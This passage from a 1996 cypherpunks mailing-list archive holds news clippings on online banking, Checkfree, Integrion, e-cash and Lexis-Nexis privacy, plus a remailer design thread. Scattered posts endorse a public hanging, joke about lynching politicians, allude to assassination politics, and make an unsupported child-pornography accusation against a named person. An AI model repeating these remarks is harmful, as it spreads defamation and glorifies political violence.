The previous year, he was managing a chain of fitness centers in the
Southwest. While pondering the best way to sell health club memberships, he
hit upon the concept of automatic monthly payments.

At the time, only a handful of companies -- most of them insurance providers
-- were collecting payments electronically.

By 1982, a year after he set up his electronic funds transfer service
company, Mr. Kight was named an "entrepreneur of the year" by Ernst & Young.
Last year, Checkfree went public.

This year the company has acquired Servantis Systems Inc. in Atlanta;
Interactive Services Corp. in Portland, Ore.; Security APL in Bloomfield,
Ill.; and Intuit Services in Downers Grove, Ill. "Each step, if you look at
it, has been one to strengthen our position and our strategic capabilities,"
Mr. Kight said.

Checkfree has kept its headquarters in Ohio, but the acquisition of
Servantis' campuslike setting in Atlanta has begged the question of whether
the offices might move. Intuit Services employees will remain in Illinois,
where the work force likely will expand.

Mr. Kight, 40, divides his time between Atlanta and Columbus and said he
will decide within a year whether to initiate a formal move.

The union of Checkfree and Intuit Services is something of a remarriage.
Checkfree was the original processor of payments emanating from Quicken
software before Intuit Inc. acquired National Payment Clearinghouse Inc.
National designed the banking connections for the rival Microsoft Money
personal finance package, and the rechristened Intuit Services Corp. went on
to handle the lion's share of payments for PC banking customers.


"Essentially, Intuit enabled Checkfree to really prove the efficacy of
electronic bill payment," Mr. Kight said of the early days. "If it hadn't
been for Intuit and the link of Checkfree and Quicken, we wouldn't have
gotten to the point where we could prove to the banks that this really does
work.

"Even though the banks didn't like the fact that we and Intuit did that
without them, at the time, they weren't doing it. So what we did is we
proved it, to get them to pay attention."

What followed was a fairly messy divorce, in which Intuit withdrew its
business from Checkfree, and Checkfree sued Intuit for patent infringement.

Mr. Kight said he managed to stay friendly with key Intuit executives. He
and Scott Cook, Intuit's founder and chairman, had "a great deal of mutual
respect," he said.

The relationships proved central to the recent acquisition. A telephone call
at the beginning of this year from Mr. Kight to Intuit chief executive
officer William V. Campbell started the ball rolling.

Mr. Kight said a news article about technology companies jockeying for
position in electronic commerce prompted him to pick up the phone.

He said he told Mr. Campbell: "You've got stress at your bill payment
service, but you're growing like crazy. I'm growing like crazy. You're
signing up banks, I'm signing up even more banks. Maybe if we work together
... and he said, 'I think you're right.' And that started it."

Mr. Kight said he and Mr. Cook agreed each company would do best to focus on
its core competency: Checkfree on transaction processing, Intuit on its
software.

"Part of Intuit's strategy didn't work too well, which was signing up more
banks" for its processing service, Mr. Kight said. "But part of its strategy
worked extremely well -- the power of Quicken working with the banks."

The acquisition will boost Checkfree's bank customers to 181, and the number
of individuals for whom it processes transactions to 1.2 million.

Seeing 1996 as a turning point, Mr. Kight said he hopes bankers will
accelerate their moves into electronic banking now that they have easier
access to Quicken.

Until now, banks that wanted to be compatible with Quicken had to become
customers of Intuit Services.

Checkfree's main competitor today is Visa Interactive. Looming on the
horizon is Integrion Financial Network, a partnership of 15 banks and IBM.

"Right now, we're 100% supportive of Integrion, but to the extent that
Integrion chooses to work in our business, we'll be very tough competitors,"
Mr. Kight said.

Mr. Kight and numerous industry observers are still trying to make sense of
Integrion. Phoebe Simpson, an electronic commerce analyst at Jupiter
Communications in New York, said: "It's going to boil down to Checkfree and
Visa Interactive in the long run. It's yet to be determined whether
Integrion plans to build an entire payment processing unit."

But David E. Weisman, who covers the same ground for Forrester Research in
Cambridge, Mass., said it will be a three-way race.

He said "Checkfree's in good position here because they've got more volume"
than Visa or Integrion.

John A. Russell, chief spokesman for Integrion member Banc One Corp. in
Columbus, Ohio, called the Intuit acquisition a "good move" for Checkfree --
of which Banc One is a longtime customer -- as well as a competitive boost.

"It's key for Checkfree to do exactly what they're doing, and that's to get
big quickly so they can realize the economies of scale in this manufacturing
process," he said. Mr. Kight agreed that such economies of scale would serve
his company well as on-line banking gains vogue.

"I don't believe that the Internet is going to happen quite as fast as the
Internet-focused people believe it's going to," Mr. Kight said.

"I think there's going to be a trend toward banks providing more service to
their customers (when they) can connect directly to the bank without the Web
being involved. I think we're going to see that evolution over the next
three or four years."

But, Mr. Kight added, "I do believe that electronic banking is absolutely on
a critical mass-adoption curve as we speak."

Success and growth haven't changed Mr. Kight's down-to-business mentality.
When asked how he celebrated last week's deal closing, Mr. Kight said, "By
getting on a plane and flying to Chicago to meet with the ISC work force."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 1 Oct 1996 08:49:49 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Making Remailers Widespread [REMAILERS]
In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com>
Message-ID: <199609301757.MAA00328@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Stewart said:
> I agree, it's a problem; the return address seems to reduce abuse.
> But one-way remailers can be used to simulate many of the uses of two-way,
> especially with message-pool return methods (e.g. alt.anonymous.messages.)
> Doing two-way remailers well is hard - most of the methods around are ok
> for passive attacks, but may not resist subpoenas, rubber-hose, or crackers.
> It's especially hard if you want the remailer to be a no-brainer to install
> and operate, rather than one that requires expert support.
> Snow's one-shot reply block method is interesting, whether you do a public-key
> or secret-key approach (if you do public key, you obviously use the public
> half for the part that stays at the remailer.)  It has the real advantage that
> compromising the remailer doesn't give you the reply information for past or
> current messages, so you can only compromise one message at a time,
> which is a big win over the one-key-per-remailer reply blocks.
> I think I like it.
> On the other hand, there are a host of potential problems:
> - Chaining is probably more difficult, at least return-chaining.

     Each reply refers to the remailer before it. 

     The originating web site hands the originator a key and a pseudo-random
ID. The originator can check check back on a regular basis to see if a reply
came back in. That way there is no "final trail" and the reciepent can 
view the page thru something like www.anonymizer.com. 


> - Individual True Believer remailer operators would usually resist
> cooperating with authorities to decrypt the reply block, but ad-hoc
> remailer operators who are just running a remailer because they haven't
> turned off the default feature that came with their Web Server
> will probably reveal the key, especially for Politically Incorrect material
> (definition depends on their individual politics, of course.)

     Set a time limit on replies (say 5 days) and after the 5 days, the 
reply is deleted by the server. That way the casual user would have 
to hack the code to _keep_ the addresses on hand, and the censors would 
have to get back thru the entire chain in 5 days, and they don't know the
entire chain to begin with. If you can get the web server spread out 
internationally, that ain't gonna happen. 

> - A web form interface, filled out from a web anonymizer, doesn't
> give you a useful return address, so spammers can still abuse it.

     If you inert the *this is an anonymous email* automaticaly, this 
won't matter as much. Commercial spammers will have to put a 
commercial access point (phone, fax, email address) in their message
and people who are just harassing others will get deleted pretty quick.

     Spam itself will be cut back as you only allow <x> number of 
addresses per message, and set it up so that you enter the addresses
on a seperate page from the message. That way to hit 2 or 3 hundered 
email addresses you have to enter the message 100 times. Ok, so cut and
paste 100 times, but if the spammer has a brain (I know, but there 
may be one or two) they are going get the spam out. 


     How about this (It is a little complicated, so it may not work)


     Alice wants to send email to Bob, so she hit's sameers anonmymizer
site to go to a random remailer web site. 

     At this site she enters Bobs email address on one page, and on the
next enters her message. This message could even be encrypted, assuming that
Bob knows what to do with it. Hit send.

     The webremailer software hands Alice a temporary (10 day expire time) 
ID and key/passphrase.

     The webremailer selects the next mailer in the chain, encrypts the 
message, writes the public key and encrypted message to disk (with 
date stamp), and forwards the email (encrypted message + key) to the next 
remailer. 
 
     The second (and each succeeding remailer in the chain) simply re-writes
the headers and writes a keyid/previous-remailer pair file (with date stamp)
to file. (maybe even keep a single database file with this info in it, 
a single file might not get written to disk as often (maybe) and with constant
would be marginally harder to "recover" old addresses from than multiple hard
files (or would it?) and then sends the mail on.

    If we can use the "puts" feature, we really don't need much in the way of
headers right?

    Anyway the last remailer in the chain writes a simple web page with the 
keyid of the keypair, and simply sends the key and an address to the receipent
so that 1) the final "message" is still not the email, only a notice that 
email is waiting, for instance http://www.encodex.com/anonmail/id0x4556/
 
    The reciepient then goes to the site (or doesn't if they don't want
email) they can use www.anonymizer.com if they wish, and they enter their key
when prompted. The encrypted file is then decrypted and sent to them.

    At this point, the encryption is more to prevent the "prying eyes" than 
TLA level snooping, so it has to be good, but it doesn't have to be 2000 bit
RSA type stuff. That can be done at the message level. 

    Return messages would include the keyid of the sent message, and would 
retrace the same hops. At the original end, a simple web page is written
and a "you have a reply to your anonymous message at http://www.encodex.com
/anonmail/id0x99a4/ 

    Holes?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 1 Oct 1996 12:27:13 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <eNV3uD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Money Daily: Tuesday, September 24, 1996

IBM, Bank Alliance May Speed Acceptance of Online
Banking

By Lloyd Chrein

If one muscle-bound company is what it will take to turn online banking into
a household word, then the recently- formed Integrion Financial Network, a
conglomeration of IBM and 15 heavy-hitting U.S. and Canadian banks, may have
the right formula, say analysts. In many ways Integrion appears a natural
fit: the meeting of a major data-processing player -- IBM -- and
institutions that will potentially need a lot of online data processed --
banks.

The new company, a separate entity with its own CEO and board of directors,
will offer the means for consumers to connect to their banks (via the IBM
Global Network, the Internet or commercial online services) and will partner
with developers of the necessary online banking software. It is expected to
begin operating in early 1997.

"If they can use the clout of all these big banks, plus IBM, to decrease the
cost of providing online banking and ultimately lower costs and improve
service for consumers, then they're going to coax more consumers into online
banking," says Karen Epper, an analyst with Forrester Research. "The
question is whether this big ship can move quickly enough to keep up with
the changes in the online world and stay in the race." As things stand now,
it seems like there is a lot of ground to be made up. A recent study by the
San Francisco-based Odyssey L.P. found that just a handful of American
households use the 'Net for banking -- just 1% of the 14% of U.S. households
with access to an online service.

"Online banking is confined to a small minority of a small minority," said
Nicholas Donatiello president of Odyssey. "But I think it has the potential
to be bigger."

Members of Integrion, however, took issue with the Odyssey report. "Those
numbers don't seem right," said David Fortney, in charge of access and
payment strategies for the Charlotte based NationsBank. "But we do agree
that there are not a lot of people banking online. We see that as a huge
opportunity. We think there is a lot of pent-up demand."

A Barnett Bank spokeswoman said that 25% of the bank's current customers use
the telephone for home banking, an indicator that online banking through
Integrion -- which should be more convenient -- will also be a hit. "We will
see an explosion in this area," she predicted. The problem with online
banking as it exists now, say Integrion members, is that each bank offers
different levels of service, uses different software, and has to bear the
full cost of designing and managing its online system. With Integrion, they
note, banks will be able to take advantage of economies of scale, ultimately
offering consumers a wider choice of software programs and means of
accessing their accounts than if they went it alone.

"What we hope to do is speed the pace at which electronic banking services
will reach the consumer," says Chuck Hieronymi, senior vice president of
marketing at NationsBank. "We also hope to speed the rate at which banks
will adopt online banking. We hope to attract as many banks to join as
possible."

The company intends to eventually allow consumers to use most of the major
personal finance software, including Microsoft Money and Intuit's Quicken,
as well as Internet browsers like Netscape Navigator and Microsoft Explorer
and online services Prodigy, America Online and CompuServe. While Integrion
hasn't formed any alliances with developers or online services so far,
potential partners are warm to the concept. "We fully expect our products
and technology will be a part of this," says Matt Cone, business development
manager for Microsoft, who notes that there are also potential uses for
Windows NT and BackOffice.

To attract all the major players under one roof, Integrion needs to be big.
And it is: the 15 member banks comprise over half the retail banking
population in North America -- more than 60 million households. Member banks
are: ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica, First Bank
Systems, First Chicago NBD, Fleet Financial Group, KeyCorp , Mellon Bank,
Michigan National Bank, NationsBank, PNC Bank, Royal Bank of Canada, and
Washington Mutual, Inc. Of course, there is competition, mainly from data
processing companies such as CheckFree and Visa Interactive -- IBM will
perform their functions for Integrion member banks. Yet according to Epper,
even the competitors are potential partners in cyberspace.

"CheckFree will compete for the same bill payment system contracts as
Integrion, but it will also work with Integrion to support bill payment
systems," says Epper. "In the online world, companies that are competitors
are also working together. That has been the paradigm for a long time."

To have any effect on improving online banking's numbers, Integrion will
have to stay on the cutting edge, reacting quickly to rapid changes in
security, authentication and other technological advancements. Hieronymi
claims that the company will be able to make quick decisions and won't be
weighed down by the girth of its many members.

But Epper has her doubts. "This company has been speculated about for two
years and in serious discussion for the past year," she says. "At the rate
at which online banking is moving, if they take that long to make decisions
they are likely to lose a real advantage. As it is, they're already a little
late to the party."

For more Web-formation, visit:

http://www.checkfree.comfor CheckFree

http://www.forrester.com for Forrester Research

http://www.ibm.com for IBM

http://www.intuit.com for Intuit

http://www.nationsbank.com for NationsBank



Computerworld: September 23, 1996

Can Banks Survive the Online Onslaught?

By Ralph Soucie

Recently, Hugh McColl, chairman of NationsBank, admitted to The Wall Street
Journal that he is scared of what technology might do to his business. That
isn't something you'd expect from the architect of a $ 192 billion banking
powerhouse. Clearly, though, trouble lies ahead for banks. The endgame of
the recent bank merger wave looks pretty bleak. Eventually, some eight to 12
banking behemoths will blanket the country. These giants will look, act and
smell the same to consumers. Absent some sort of blockbuster development,
the entire industry seems headed for the same fate suffered recently by the
large retailers.

But that blockbuster development is inevitable, and it surely will be driven
by information technology. Technology at least the leading-edge stuff that
creates monster opportunities isn't most banking executives' major
stock-in-trade, so they don't even know where their future competitors are
going to come from.

To be sure, banks are trying some new tricks as they scrounge for growth.
Some, for instance, are using automated teller machines to dispense coupons
and sell event tickets. Not a bad idea, but it still doesn't solve the core
problem. Electronic home banking software seems a better fit, but so far, it
has generated me-too products and little profit.

Meanwhile, bankers' favorite retail customers cash-rich individuals with low
transaction activity are a threatened species. Taking money from these
customers and lending it to free-spending Baby Boomers is really the heart
of retail banking nowadays. But families who inherit such liquid assets from
their parents are likely to apply much of this loot to debt reduction.

The problem is that consumers don't perceive high value in generic banking
services, and with good reason. As surely as you're reading this, within a
generation we'll be carrying our financial assets around on some form of
smart card. You'll deal with your depository bank much as you interact with
the bank that issues your credit card.

But the irony is that all this doesn't have to be the death knell for the
banking industry. Banking executives simply need to worry less about
high-tech rivals and more about the value they add to customer services.

Take the lowly bank statement, for example. What if a bank offered small
businesses the option of receiving their bank statements in electronic form,
say, as an Excel spreadsheet file? Why not provide a listing of canceled
checks for the entire fiscal year? The owner could then take this disk file,
along with his check register, to his accountant. The accountant would then
add data such as payee name and the date the check was written.

For a small business that writes 100 checks per month, this could save a few
hundred dollars in fees. That's a bank service that packs a punch, yet the
incremental cost to the bank of providing the service would be very small.

Numerous variations are possible. For instance, nonbusiness bank customers
might find it useful to flag tax-deductible payments by putting an X in a
box when they write the check. The bank can then provide a year-end listing
of tax deductions a great headache-buster at tax time.

It doesn't take advanced technology to deliver services such as these. What
it takes is customer-oriented thinking, combined with simple awareness of
how technology can support a new value proposition.

So, while bankers should heed Andy Grove's "paranoia is good" message, they
should worry less about technology threats and more about an industry
culture that's rooted in an assumption of entitlement.


Money Daily: Thursday, September 19, 1996

Privacy Storm Shows the Best and Worst of the 'Net

By Michael Brush

The flap over a new service from Lexis-Nexis is probably misguided, but
raises interesting questions about privacy and the power of online
communication.

An online brouhaha that broke out this week over alleged privacy breaches
caused by a new Lexis-Nexis product has put both the best and worst of the
'Net community in high profile.

The Dayton, Ohio-based online database company has been swamped with phone
calls and faxes this week because of a flurry of e-mails and news-group
postings warning readers of the allegedly dire consequences of its new
product called P- TRAK. Many of the warnings falsely claim that P-TRAK
provides a wide range of potentially sensitive personal information ranging
from social security numbers to medical and credit histories.

On the bright side, the controversy shows the huge power of the 'Net when
used by public-spirited advocates to mobilize a response to a perceived
danger -- in this case, a threat to privacy. On the dark side, the fact that
many of the allegations in the electronic correspondence are plain wrong
shows how easy it is to spread misinformation and, potentially, raise what
could amount to an online lynch mob.

At issue is a product launched last June which provides Nexis-Lexis clients
with basic public information about anyone in a 300 million-name database.
The information available is culled from credit bureau records. It is
limited to your name, your maiden name or alias (if any), your current and
two most recent past addresses, the month and year of your birth, and your
phone number -- though not all of that information is available on every
person.

For nine days after the product was released last June 2, P- TRAK also
included your social security number. But the SSNs were pulled on June 11
because of complaints, says Lexis- Nexis spokesman Steve Edwards. If you
already know someone's social security number, though, you can search for
him or her using that number.

P-TRAK is meant to help attorneys track down witnesses, heirs or parents who
have stopped paying child support, says Edwards.

While the scope of P-TRAK is relatively limited compared to, say, credit
reports, which carry news of your payment history, bankruptcies and other
such sensitive material, it nonetheless sparked the ire of many 'Net users.

For example, one posting that was later widely circulated this week claimed
that your social security number, "mother's maiden name, birth date and
other personal information are now available to anyone with a credit card."
It postulated that the information could allow someone to commit credit card
fraud or use your identity.

The truth is somewhat tamer. The SSN and mother's maiden name are not
included, for example, and the database is available only to clients like
law firms and news organizations that can afford Lexis-Nexis's relatively
hefty fees.

Furthermore, Money Daily's spot check shows that the information available
is spotty at best. A search of P-TRAK run on our behalf by the Time Inc.
Research Center turned up the right addresses but no phone or birth date for
this author. It got the addresses and birth year correct for Money Daily
editor Kevin McKean, but had an obsolete phone number. And when confronted
with relatively more common names of two other Money Online staffers -- tech
director Wilson Smith and reporter Joseph "Tripp" Reynolds -- turned up
dozens of people, none of whom proved to be the correct ones.

Those limitations notwithstanding, the roar on the 'Net was heard at
Lexis-Nexis headquarters. "We have been deluged with people calling, writing
and faxing," says Edwards.

"People are asking us: 'Why are you putting my medical records, my mother's
maiden name, and my credit card history out there?' This has been testing
the limits of our customer service."

In response, Lexis-Nexis posted a statement on its home page to correct
false information about the product and also a form you can use to remove
your name from the list, something the company says people could have done
all along by calling. By next Monday, Edwards says the firm will also have
an 800 number that callers can use. People who phone the company's current
800 number are told to fax name-removal requests to 513-865-1930.

The company has stopped short of posting responses in news groups or
bulletin boards, though. "There are different schools of thought on that,"
says Edwards. "One says that you should never respond to news groups from a
company standpoint because that increases the amount of flaming. But at this
point, I don't know how much worse it could get."

In the company's place, other news group participants have stepped in to set
the record straight. "I think you owe a post to correct this error," one
such correspondent scolded in a reply that pointed out several errors in the
message quoted above.

Ironically, the information available in P-TRAK is mild compared to what is
available elsewhere in the vast Lexis- Nexis database.

A related product, called P-FIND, for example, offers additional household
information like the appraised value of a home in many states and the number
of dependents (both of which are public information). The main Nexis
database digs up information from news stories -- often from local papers --
published around the world and in several different languages. Many of those
stories, of course, contain information of arrests and charges that may
later prove groundless, as well as a volume of personal information about
the people cited in the articles. And the legal Lexis service contains not
only details from civil and criminal court cases around the nation, but also
other potentially sensitive information, such as tax liens and judgments
against individuals.

Before you get your hackles up over invasion of privacy, though, consider
that all of the above is public information -- and, of course, much of it is
potentially more sensitive than your previous address.

For more Web-formation, visit:

Lexis-Nexis (http://www.lexis-nexis.com )

Lexis-Nexis statement ( http://www.lexis-nexis.com/lncc/p-trak/index.html)

Form to remove your name from the Lexis-Nexus database
(http://www.lexis-nexis.com/lncc/about/ptrak.html)


Reuters: Friday, September 20, 1996

Summers: Electronic Cash Won't Affect Economy Much

The advent of electronic money is not expected to have any major
macroeconomic effect in the medium term, U.S. Deputy Treasury Secretary
Lawrence Summers said on Friday.

"I do not anticipate in the near and medium term significant macro-economic
effects," Summers told reporters following a speech to a conference on
electronic money sponsored by the Treasury Department.

Some analysts have speculated that the Federal Reserve's ability to conduct
monetary policy may be undermined by the issuance of electronic money over
the Internet or elsewhere.

Others have suggested that the Fed and Treasury could lose profits from
seigniorage -- the income earned by currency issuers because currency pays
no interest to holders.

Summers though played down both those concerns. He noted that much U.S.
currency is held abroad and said electronic money is unlikely to substitute
for that anytime soon.

As for monetary policy, it already works indirectly through open market
operations, he noted.

"As we move from credit cards to debit cards to stored value cards, I think
the Fed will continue to have the ability, by operating in the government
securities market, to have a substantial influence on the level of interest
rates," Summers said.

He saw macroeconomic benefits to be gained from the advent of electronic
money and stored value. If, like credit cards, they make it easier for
consumers to purchase goods during economic downturns, then they can act as
a stabilizing force on consumption.

"To the extent that these technologies and the Internet make markets more
competitive, they will tend to ... be a force against inflation," he added.


Reuters: Wednesday, September 18, 1996

Germany to Let Only Banks Issue E-Cash

By Catherine O'Mahony

Bundesbank council member Franz-Christoph Zeitler on Wednesday welcomed
government plans to give only banks the right to issue pre-paid cards or
so-called electronic purses.

Stressing the German central bank's concern about electronic money, he said
banks were the safest guardians of electronic cash systems since they had to
meet legally-imposed liquidity restrictions and had long experience of
cashless payments.

Zeitler said in a statement that electronic money innovations were
fundamentally positive as a way to speed up transfers. But "it is also
important that the security of payment transfers and currency stability do
not get left behind," he added.

Electronic purses are plastic cards with an inbuilt micro-chip which stores
the electronic cash value of users' accounts and can be reloaded at special
machines.

The proposal to restrict such projects to banks is part of a new German
banking law which is still under preparation but which is expected to be
enforced in 1997.

Zeitler said issuers of electronic cash had to be extremely reliable because
a sudden collapse of an electronic cash system, due to forgery or technical
failure, could have "significant negative" consequences for the economy.

While electronic purses, also known as smart cards, are not yet available in
cash-dominated Germany, tests are being run on several projects. Current
projects being tested in the Munich region include a card to pay for
telephone calls and local train tickets and another with broader
application, which can be used for small purchases up to 50 marks ($ 33.03).

Worldwide, the most prominent electronic purse project is Mondex which was
developed in Britain by National Westminster Bank and is on trial in the
town of Swindon.

Zeitler said it was likely that Bonn would also restrict the rights to
create and maintain of Internet-based electronic cash systems to the banking
industry.

Internet banking is slowly gaining credence in Germany. Bavaria's Bayerische
Hypotheken und Wechsel Bank recently launched a securities account
accessible via the Internet.

($ 1=1.5138 Mark)


American Banker: Thursday, September 19, 1996

Seeking Security, Banks Turn to Internet Certification

By DREW CLARK

On the Internet, no one can tell if you're a dog.

This line, from a New Yorker cartoon, belies a serious problem for banks and
merchants setting up sites on the World Wide Web: There is no widely
accepted method for authenticating the claims -- or the identity -- of those
conducting business on-line.

To help solve this problem, two companies have begun certifying businesses
by granting them "seals of approval" on the Web.

"There needs to be some way that consumers can easily recognize when a site
is secure and when it is not secure," said Michael S. Karlin, president of
the Security First Network Bank. "Consumers are afraid, even in an
FDIC-approved banking situation, and they want the feeling that it is
secure."

One of the first systems to offer authentication for commercial sites on the
World Wide Web is TrueSite, developed by Application Programming and
Development Inc. of Camp Springs, Md.

BankAmerica Corp., Mellon Bank Corp., and First Bank System Inc. are among
30 financial institutions and 2,000 businesses whose Web sites have been
certified.

Though the Web provides businesses with a flexible, highly visible medium
for presenting their message, on-line business has its drawbacks. A Web site
user can download the entire contents of a Web page, alter it, and establish
a dummy site at a new location.

TrueSite guards against such occurrences by letting certified banks and
businesses put a blue check mark symbol on their home pages for an annual
fee of $495, which has been waived for six months. Users clicking on the
logo will be warned if it has been fraudulently copied.

"A user won't have to ask, 'Did I get to the correct site in the first
place?,'" said Mark Burnett, president of Application Programming, which has
annual revenues of $2 million.

"Whether consumers feel comfortable engaging in transactions on the Internet
is a function of how they feel," added Jack Rogers, president of the
Fairfax, Va.-based American Finance & Investment Corp. "Their perception is
as important as reality."

Another certification was launched in July by the National Computer Security
Association in Carlisle, Pa.

The association requires that certified companies protect their Web sites
against Internet attacks by using data encryption, by maintaining detailed
logs, and by establishing firewalls within the computers that host Web
sites.

"You better have some confidence that a hacker doesn't have access to
checking accounts," said Kevin J. Stevens, a product manager at the for-
profit association, which has annual revenues of $5 million. "If banks don't
take the steps to be certified and give their market some indication that
they have instituted a security program, no public relations is going to
resolve only one slip-up."

So far six companies have each paid upwards of $8,500 for a detailed on-
site audit before getting the association's stamp of approval. Mr. Stevens
declined to identify them, but said they include one of the big three auto
companies.

"This is a great first step. What the NCSA has done is to put the bar up,"
said Security First's Mr. Karlin. He anticipates that the virtual bank will
be certified within two months and hopes that the association will
eventually introduce a system with several passing grades.

America Online Inc. and the Better Business Bureau are also getting into the
certification business.

In conjunction with America Online's move to the New York Stock Exchange
from Nasdaq, its top officials reemphasized the features of the largest
on-line service and announced 10 new criteria that merchants will be
required to meet.

The standards include processing orders and responding to E-mails within one
day of receipt and giving on-line customers equal priority with telephone
customers.

"AOL members will come to know and have confidence in people who display the
seal of approval," said Michael J. Minigan, the service's vice president of
interactive marketing. "It is our hope that at some point, merchants doing
business on the Web would want to have the AOL seal on their Web sites."

Officials at the Better Business Bureau promote self-regulation and full
disclosure of company complaints to fill cues missing from on-line commerce.

"For $30 a month, a business can design a fabulous Web page that can lead a
consumer to think they are a Fortune 500 company," said spokeswoman Holly
Cheriko. "The consumer is left without the cues in the traditional
marketplace like being able to visit, talk to the sales clerk, and view the
quality of the marketplace. They need a trusted means to determine which
businesses are reliable and what commitment they have made to the consumer."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 1 Oct 1996 08:00:30 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [AP] Afghanistan
In-Reply-To: <kkc1uD66w165w@bwalk.dm.com>
Message-ID: <199609301804.NAA00350@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> 
> Afghanis publicly hanged their former president, Najibullah [no last name].
> Other countries should follow their example.

One of my other .sigs:

Think Globally. Act Locally. Support your Local Politician. With a rope.
   4 lines, it isn't the law, it is simple fire prevention.
      Pain is a feature, not a bug. 
petro@suba.com petro@encodex.com petro@netsight.net petro@smoke.suba.com 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 1 Oct 1996 08:01:52 +0800
To: wombat@mcfeely.bsfs.org (Rabid Wombat)
Subject: Re: Public Schools
In-Reply-To: <Pine.BSF.3.91.960929133255.13454B-100000@mcfeely.bsfs.org>
Message-ID: <199609301822.NAA00388@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> On Sat, 28 Sep 1996, Adamsc wrote:
> able to learn from their experiences, and will probably find working for 
> them less frustrating than working for a "Dilbert Zone" manager. Sooner 
> or later, though, you will encounter Dilbert's boss in the workplace, and 
> not everyone can leave to become a famous cartoonist. You may need to 

     Well, there is always AP. 

> become (eeek!) a technical manager. You won't fare well if you've 
> completely neglected those non-technical skills. You'll be forced to 
> communicate with mundanes ...
> Work to succeed in that creative writing course. Someday you will have a 
> Great Idea, and no matter how well you know you can implement the Great 
> Idea, you will need to convince others to believe, too. You will need 
> funding, or staffing, or equipment, and you will need to make others 
> understand the Great Idea, even if they do not have the technical 
> background to do so. You will be a sad and frustrated individual if you 
> cannot convince them.

     You get hold of a technical writer, explain it to them (they are use
to translating geek to mundane).

> Pack in all the math and comp sci you can, but take a real English course 
> or two, and not "pocket protector comp. 101", either. Dabble in eastern 
> philosophy, art history, or whatever catches your fancy, and see a bit of 
> the world outside the computer lab. Your technical skills will take you 
> much farther if you can understand their impact on the world. Good luck.

     While this is all true, most of it could be aquired in a competent 
High School.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 1 Oct 1996 06:28:12 +0800
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] A daily warning regarding Tim C. May
Message-ID: <9609301727.AA25963@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Embedded in Tim C. May's babblings are preposterous lies, wild 
distortions, child pornography (both as graphic descriptions 
and in JPEG format), ethnic slurs, and racial epithets.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 1 Oct 1996 07:56:41 +0800
To: cypherpunks@toad.com
Subject: Re: the theory of split currency
In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com>
Message-ID: <mDX3uD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> 
> > Is there a name for a dual or split currency, in which
> > there is one currency for domestic use and another, different
> > appearing, currency for foreign usage?
> 
> I don't know of such a name, however...
> 
> > Does anyone know of any country which has had such a
> > split currency?
> 
> ...this has been a common situation, in fact. South Africa, China, the
> Soviet Union, and other unpleasant places have repeatedly done
> this. Its usually a remarkably stupid idea.
> 
> Perry

Several Western European countries had such split currencies after WW II.
Belgium's two francs have almost been phased out. Spain is the only major
country with two currencies (ESP and ESB). They actually fetch slightly
different interest rates.

Chile introduced 'unidad de fomento' a while back, and many other minor
players do something similar.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 1 Oct 1996 02:07:50 +0800
To: cypherpunks@toad.com
Subject: ADJ_ust
Message-ID: <199609301350.NAA10824@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-30-96. NYP: 
 
   "National Security Experts Plan for Wars Whose Targets and 
   Weapons Are All Digital." 
 
      Is the threat real, or is this just another way to win 
      scarce funds? 
 
      Military and intelligence officials believe that enemy 
      nations, terrorists and criminal groups either already 
      have the capability to mount information warfare strikes 
      or soon will. Criminals are quickly progressing beyond 
      the vandalism and petty theft associated with teen-aged 
      hackers and into robbery and extortion schemes ranging 
      up to millions of dollars, corporate executives and 
      private investigators say. 
 
      Others reply that the worst threats mentioned are mostly 
      speculation. "Information warfare is a risk to our 
      nation's economy and defense," said Martin Libicki, a 
      senior fellow at the National Defense University. "But 
      I believe we will find ways to cope with these attacks, 
      adjust and shake them off, just as we do to natural 
      disasters like hurricanes." 
 
   ----- 
 
   http://jya.com/adjust.txt  (14 kb) 
 
   ADJ_ust 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 14:04:24 +0800
To: cypherpunks@toad.com
Subject: Diffie Speaks at Sun^h^h^hMIT: "Cryptology, Technology, andPolitics"
